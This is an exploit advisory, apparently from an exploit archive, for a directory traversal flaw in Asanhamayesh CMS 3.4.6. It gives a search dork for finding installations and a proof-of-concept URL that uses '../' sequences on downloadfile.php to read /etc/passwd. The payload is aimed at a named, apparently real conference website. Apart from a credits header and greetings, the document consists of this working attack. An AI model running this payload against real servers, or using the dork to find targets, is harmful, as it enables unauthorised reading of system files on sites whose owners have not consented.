| # Title : Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability
| # Author : indoushka
| # Telegram : @indoushka
| # Dork : طراح و پشتیبان : آسان همایش (نرم افزار مدیریت همایش و کنفرانس) ویرایش 3.4.6
| # Tested on: windows 8.1 Français V.(Pro)
| # Download : asanhamayesh.com
================================================================================================
poc:
[+] use payload : /downloadfile.php?file=../../../../../../../../../../etc/passwd
http://itjdconf.ir/fa/downloadfile.php?file=../../../../../../../../../../etc/passwd
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================